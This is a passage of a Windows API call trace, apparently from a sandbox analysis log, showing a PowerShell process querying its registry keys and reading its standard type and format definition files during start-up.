	[0744.580] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd748 | out: phkResult=0x1cd748*=0x32c) returned 0x0
	[0744.580] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd6cc, lpData=0x0, lpcbData=0x1cd6c8*=0x0 | out: lpType=0x1cd6cc*=0x1, lpData=0x0, lpcbData=0x1cd6c8*=0x56) returned 0x0
	[0744.580] CoTaskMemAlloc (cb=0x5a) returned 0x3e8a00
	[0744.580] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd69c, lpData=0x3e8a00, lpcbData=0x1cd698*=0x56 | out: lpType=0x1cd69c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1cd698*=0x56) returned 0x0
	[0744.580] CoTaskMemFree (pv=0x3e8a00) 
	[0744.581] RegCloseKey (hKey=0x32c) returned 0x0
	[0744.581] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0744.581] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0745.868] VirtualQuery (in: lpAddress=0x1cc430, lpBuffer=0x1cd2f0, dwLength=0x30 | out: lpBuffer=0x1cd2f0*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0747.281] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x32c
	[0747.281] GetFileType (hFile=0x32c) returned 0x1
	[0747.281] SetErrorMode (uMode=0x1) returned 0x1
	[0747.281] GetFileType (hFile=0x32c) returned 0x1
	[0747.281] ReadFile (in: hFile=0x32c, lpBuffer=0x2e09ab0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd6e8, lpOverlapped=0x0 | out: lpBuffer=0x2e09ab0*, lpNumberOfBytesRead=0x1cd6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0747.282] ReadFile (in: hFile=0x32c, lpBuffer=0x2e09ab0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd6e8, lpOverlapped=0x0 | out: lpBuffer=0x2e09ab0*, lpNumberOfBytesRead=0x1cd6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0747.283] ReadFile (in: hFile=0x32c, lpBuffer=0x2e09ab0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd6e8, lpOverlapped=0x0 | out: lpBuffer=0x2e09ab0*, lpNumberOfBytesRead=0x1cd6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0747.284] ReadFile (in: hFile=0x32c, lpBuffer=0x2e09ab0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd6e8, lpOverlapped=0x0 | out: lpBuffer=0x2e09ab0*, lpNumberOfBytesRead=0x1cd6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0747.284] ReadFile (in: hFile=0x32c, lpBuffer=0x2e09ab0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd6e8, lpOverlapped=0x0 | out: lpBuffer=0x2e09ab0*, lpNumberOfBytesRead=0x1cd6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0747.286] ReadFile (in: hFile=0x32c, lpBuffer=0x2e09ab0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd6e8, lpOverlapped=0x0 | out: lpBuffer=0x2e09ab0*, lpNumberOfBytesRead=0x1cd6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0747.286] ReadFile (in: hFile=0x32c, lpBuffer=0x2e09ab0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd6e8, lpOverlapped=0x0 | out: lpBuffer=0x2e09ab0*, lpNumberOfBytesRead=0x1cd6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0747.286] ReadFile (in: hFile=0x32c, lpBuffer=0x2e09ab0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd6e8, lpOverlapped=0x0 | out: lpBuffer=0x2e09ab0*, lpNumberOfBytesRead=0x1cd6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0747.287] ReadFile (in: hFile=0x32c, lpBuffer=0x2e09ab0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd6e8, lpOverlapped=0x0 | out: lpBuffer=0x2e09ab0*, lpNumberOfBytesRead=0x1cd6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0747.288] ReadFile (in: hFile=0x32c, lpBuffer=0x2e09ab0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd6e8, lpOverlapped=0x0 | out: lpBuffer=0x2e09ab0*, lpNumberOfBytesRead=0x1cd6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0747.289] ReadFile (in: hFile=0x32c, lpBuffer=0x2e09ab0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd6e8, lpOverlapped=0x0 | out: lpBuffer=0x2e09ab0*, lpNumberOfBytesRead=0x1cd6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0747.289] ReadFile (in: hFile=0x32c, lpBuffer=0x2e09ab0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd6e8, lpOverlapped=0x0 | out: lpBuffer=0x2e09ab0*, lpNumberOfBytesRead=0x1cd6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0747.289] ReadFile (in: hFile=0x32c, lpBuffer=0x2e09ab0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd6e8, lpOverlapped=0x0 | out: lpBuffer=0x2e09ab0*, lpNumberOfBytesRead=0x1cd6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0747.289] ReadFile (in: hFile=0x32c, lpBuffer=0x2e09ab0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd6e8, lpOverlapped=0x0 | out: lpBuffer=0x2e09ab0*, lpNumberOfBytesRead=0x1cd6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0747.290] ReadFile (in: hFile=0x32c, lpBuffer=0x2e09ab0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd6e8, lpOverlapped=0x0 | out: lpBuffer=0x2e09ab0*, lpNumberOfBytesRead=0x1cd6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0747.290] ReadFile (in: hFile=0x32c, lpBuffer=0x2e09ab0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd6e8, lpOverlapped=0x0 | out: lpBuffer=0x2e09ab0*, lpNumberOfBytesRead=0x1cd6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0747.290] ReadFile (in: hFile=0x32c, lpBuffer=0x2e09ab0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd6e8, lpOverlapped=0x0 | out: lpBuffer=0x2e09ab0*, lpNumberOfBytesRead=0x1cd6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0747.293] ReadFile (in: hFile=0x32c, lpBuffer=0x2e09ab0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd6e8, lpOverlapped=0x0 | out: lpBuffer=0x2e09ab0*, lpNumberOfBytesRead=0x1cd6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0747.293] ReadFile (in: hFile=0x32c, lpBuffer=0x2e09ab0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd6e8, lpOverlapped=0x0 | out: lpBuffer=0x2e09ab0*, lpNumberOfBytesRead=0x1cd6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0747.294] ReadFile (in: hFile=0x32c, lpBuffer=0x2e09ab0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd6e8, lpOverlapped=0x0 | out: lpBuffer=0x2e09ab0*, lpNumberOfBytesRead=0x1cd6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0747.294] ReadFile (in: hFile=0x32c, lpBuffer=0x2e09ab0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd6e8, lpOverlapped=0x0 | out: lpBuffer=0x2e09ab0*, lpNumberOfBytesRead=0x1cd6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0747.294] ReadFile (in: hFile=0x32c, lpBuffer=0x2e09ab0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd6e8, lpOverlapped=0x0 | out: lpBuffer=0x2e09ab0*, lpNumberOfBytesRead=0x1cd6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0747.295] ReadFile (in: hFile=0x32c, lpBuffer=0x2e09ab0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd6e8, lpOverlapped=0x0 | out: lpBuffer=0x2e09ab0*, lpNumberOfBytesRead=0x1cd6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0747.295] ReadFile (in: hFile=0x32c, lpBuffer=0x2e09ab0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd6e8, lpOverlapped=0x0 | out: lpBuffer=0x2e09ab0*, lpNumberOfBytesRead=0x1cd6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0747.295] ReadFile (in: hFile=0x32c, lpBuffer=0x2e09ab0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd6e8, lpOverlapped=0x0 | out: lpBuffer=0x2e09ab0*, lpNumberOfBytesRead=0x1cd6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0747.296] ReadFile (in: hFile=0x32c, lpBuffer=0x2e09ab0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd6e8, lpOverlapped=0x0 | out: lpBuffer=0x2e09ab0*, lpNumberOfBytesRead=0x1cd6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0747.296] ReadFile (in: hFile=0x32c, lpBuffer=0x2e09ab0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd6e8, lpOverlapped=0x0 | out: lpBuffer=0x2e09ab0*, lpNumberOfBytesRead=0x1cd6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0747.296] ReadFile (in: hFile=0x32c, lpBuffer=0x2e09ab0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd6e8, lpOverlapped=0x0 | out: lpBuffer=0x2e09ab0*, lpNumberOfBytesRead=0x1cd6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0747.297] ReadFile (in: hFile=0x32c, lpBuffer=0x2e09ab0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd6e8, lpOverlapped=0x0 | out: lpBuffer=0x2e09ab0*, lpNumberOfBytesRead=0x1cd6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0747.297] ReadFile (in: hFile=0x32c, lpBuffer=0x2e09ab0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd6e8, lpOverlapped=0x0 | out: lpBuffer=0x2e09ab0*, lpNumberOfBytesRead=0x1cd6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0747.297] ReadFile (in: hFile=0x32c, lpBuffer=0x2e09ab0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd6e8, lpOverlapped=0x0 | out: lpBuffer=0x2e09ab0*, lpNumberOfBytesRead=0x1cd6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0747.298] ReadFile (in: hFile=0x32c, lpBuffer=0x2e09ab0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd6e8, lpOverlapped=0x0 | out: lpBuffer=0x2e09ab0*, lpNumberOfBytesRead=0x1cd6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0747.298] ReadFile (in: hFile=0x32c, lpBuffer=0x2e09ab0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd6e8, lpOverlapped=0x0 | out: lpBuffer=0x2e09ab0*, lpNumberOfBytesRead=0x1cd6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0747.303] ReadFile (in: hFile=0x32c, lpBuffer=0x2e09ab0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd6e8, lpOverlapped=0x0 | out: lpBuffer=0x2e09ab0*, lpNumberOfBytesRead=0x1cd6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0747.303] ReadFile (in: hFile=0x32c, lpBuffer=0x2e09ab0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd6e8, lpOverlapped=0x0 | out: lpBuffer=0x2e09ab0*, lpNumberOfBytesRead=0x1cd6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0747.303] ReadFile (in: hFile=0x32c, lpBuffer=0x2e09ab0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd6e8, lpOverlapped=0x0 | out: lpBuffer=0x2e09ab0*, lpNumberOfBytesRead=0x1cd6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0747.304] ReadFile (in: hFile=0x32c, lpBuffer=0x2e09ab0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd6e8, lpOverlapped=0x0 | out: lpBuffer=0x2e09ab0*, lpNumberOfBytesRead=0x1cd6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0747.304] ReadFile (in: hFile=0x32c, lpBuffer=0x2e09ab0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd6e8, lpOverlapped=0x0 | out: lpBuffer=0x2e09ab0*, lpNumberOfBytesRead=0x1cd6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0747.304] ReadFile (in: hFile=0x32c, lpBuffer=0x2e09ab0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd6e8, lpOverlapped=0x0 | out: lpBuffer=0x2e09ab0*, lpNumberOfBytesRead=0x1cd6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0747.305] ReadFile (in: hFile=0x32c, lpBuffer=0x2e09ab0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd6e8, lpOverlapped=0x0 | out: lpBuffer=0x2e09ab0*, lpNumberOfBytesRead=0x1cd6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0747.305] ReadFile (in: hFile=0x32c, lpBuffer=0x2e09ab0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd6e8, lpOverlapped=0x0 | out: lpBuffer=0x2e09ab0*, lpNumberOfBytesRead=0x1cd6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0747.306] ReadFile (in: hFile=0x32c, lpBuffer=0x2e09ab0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd6e8, lpOverlapped=0x0 | out: lpBuffer=0x2e09ab0*, lpNumberOfBytesRead=0x1cd6e8*=0x1b4, lpOverlapped=0x0) returned 1
	[0747.306] ReadFile (in: hFile=0x32c, lpBuffer=0x2e09ab0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd6e8, lpOverlapped=0x0 | out: lpBuffer=0x2e09ab0*, lpNumberOfBytesRead=0x1cd6e8*=0x0, lpOverlapped=0x0) returned 1
	[0747.306] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd748 | out: phkResult=0x1cd748*=0x32c) returned 0x0
	[0747.306] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd6cc, lpData=0x0, lpcbData=0x1cd6c8*=0x0 | out: lpType=0x1cd6cc*=0x1, lpData=0x0, lpcbData=0x1cd6c8*=0x56) returned 0x0
	[0747.306] CoTaskMemAlloc (cb=0x5a) returned 0x288eae0
	[0747.306] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd69c, lpData=0x288eae0, lpcbData=0x1cd698*=0x56 | out: lpType=0x1cd69c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1cd698*=0x56) returned 0x0
	[0747.307] CoTaskMemFree (pv=0x288eae0) 
	[0747.307] RegCloseKey (hKey=0x32c) returned 0x0
	[0747.307] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0747.307] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0755.195] VirtualQuery (in: lpAddress=0x1cc430, lpBuffer=0x1cd2f0, dwLength=0x30 | out: lpBuffer=0x1cd2f0*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0759.471] CoTaskMemAlloc (cb=0x104) returned 0x3c4320
	[0759.471] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c4320, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0759.471] CoTaskMemFree (pv=0x3c4320) 
	[0760.785] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd8e8 | out: phkResult=0x1cd8e8*=0x318) returned 0x0
	[0760.785] RegQueryValueExW (in: hKey=0x318, lpValueName="path", lpReserved=0x0, lpType=0x1cd8fc, lpData=0x0, lpcbData=0x1cd8f8*=0x0 | out: lpType=0x1cd8fc*=0x1, lpData=0x0, lpcbData=0x1cd8f8*=0x74) returned 0x0
	[0760.785] RegQueryValueExW (in: hKey=0x318, lpValueName="path", lpReserved=0x0, lpType=0x1cd86c, lpData=0x0, lpcbData=0x1cd868*=0x0 | out: lpType=0x1cd86c*=0x1, lpData=0x0, lpcbData=0x1cd868*=0x74) returned 0x0
	[0760.785] CoTaskMemAlloc (cb=0x78) returned 0x36e580
	[0760.785] RegQueryValueExW (in: hKey=0x318, lpValueName="path", lpReserved=0x0, lpType=0x1cd83c, lpData=0x36e580, lpcbData=0x1cd838*=0x74 | out: lpType=0x1cd83c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x1cd838*=0x74) returned 0x0
	[0760.785] CoTaskMemFree (pv=0x36e580) 
	[0760.785] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x1cd5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0760.785] SetErrorMode (uMode=0x1) returned 0x1
	[0760.785] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x1cd7c0 | out: lpFileInformation=0x1cd7c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0760.785] SetErrorMode (uMode=0x1) returned 0x1
	[0760.786] CoTaskMemAlloc (cb=0x104) returned 0x3c4320
	[0760.786] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c4320, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0760.787] CoTaskMemFree (pv=0x3c4320) 
	[0760.820] CoTaskMemAlloc (cb=0x104) returned 0x3c4320
	[0760.820] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c4320, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0760.820] CoTaskMemFree (pv=0x3c4320) 
	[0760.822] CoTaskMemAlloc (cb=0x104) returned 0x3c4320
	[0760.822] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c4320, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0760.822] CoTaskMemFree (pv=0x3c4320) 
	[0760.824] CoTaskMemAlloc (cb=0x104) returned 0x3c4320
	[0760.824] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c4320, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0760.824] CoTaskMemFree (pv=0x3c4320) 
	[0760.825] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0760.825] SetErrorMode (uMode=0x1) returned 0x1
	[0760.825] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x320
	[0760.825] GetFileType (hFile=0x320) returned 0x1
	[0760.825] SetErrorMode (uMode=0x1) returned 0x1
	[0760.825] GetFileType (hFile=0x320) returned 0x1
	[0760.826] ReadFile (in: hFile=0x320, lpBuffer=0x33bb2a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x33bb2a0*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0762.173] ReadFile (in: hFile=0x320, lpBuffer=0x33bb2a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x33bb2a0*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0762.173] ReadFile (in: hFile=0x320, lpBuffer=0x33bb2a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x33bb2a0*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0762.173] ReadFile (in: hFile=0x320, lpBuffer=0x33bb2a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x33bb2a0*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0762.174] ReadFile (in: hFile=0x320, lpBuffer=0x33bb2a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x33bb2a0*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0762.175] ReadFile (in: hFile=0x320, lpBuffer=0x33bb2a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x33bb2a0*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0762.175] ReadFile (in: hFile=0x320, lpBuffer=0x33bb2a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x33bb2a0*, lpNumberOfBytesRead=0x1cd458*=0x9e2, lpOverlapped=0x0) returned 1
	[0762.175] ReadFile (in: hFile=0x320, lpBuffer=0x33ba7ea, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x33ba7ea*, lpNumberOfBytesRead=0x1cd458*=0x0, lpOverlapped=0x0) returned 1
	[0762.175] ReadFile (in: hFile=0x320, lpBuffer=0x33bb2a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x33bb2a0*, lpNumberOfBytesRead=0x1cd458*=0x0, lpOverlapped=0x0) returned 1
	[0762.175] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd4e8 | out: phkResult=0x1cd4e8*=0x320) returned 0x0
	[0762.175] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd46c, lpData=0x0, lpcbData=0x1cd468*=0x0 | out: lpType=0x1cd46c*=0x1, lpData=0x0, lpcbData=0x1cd468*=0x56) returned 0x0
	[0762.176] CoTaskMemAlloc (cb=0x5a) returned 0x288e990
	[0762.176] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd43c, lpData=0x288e990, lpcbData=0x1cd438*=0x56 | out: lpType=0x1cd43c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1cd438*=0x56) returned 0x0
	[0762.176] CoTaskMemFree (pv=0x288e990) 
	[0762.176] RegCloseKey (hKey=0x320) returned 0x0
	[0762.176] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0762.176] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0762.187] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0x6b922394, Data2=0x4c1a, Data3=0x4c16, Data4=([0]=0xad, [1]=0xb2, [2]=0x29, [3]=0x8f, [4]=0xea, [5]=0xdf, [6]=0x9a, [7]=0x72))) returned 0x0
	[0762.203] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0x2bfd98a5, Data2=0x79e6, Data3=0x4b2d, Data4=([0]=0xaf, [1]=0x1c, [2]=0xda, [3]=0x45, [4]=0x73, [5]=0x0, [6]=0x7b, [7]=0x32))) returned 0x0
	[0762.205] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x320
	[0762.205] GetFileType (hFile=0x320) returned 0x1
	[0762.205] SetErrorMode (uMode=0x1) returned 0x1
	[0762.205] GetFileType (hFile=0x320) returned 0x1
	[0762.206] ReadFile (in: hFile=0x320, lpBuffer=0x33e5e08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x33e5e08*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0762.207] ReadFile (in: hFile=0x320, lpBuffer=0x33e5e08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x33e5e08*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0762.208] ReadFile (in: hFile=0x320, lpBuffer=0x33e5e08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x33e5e08*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
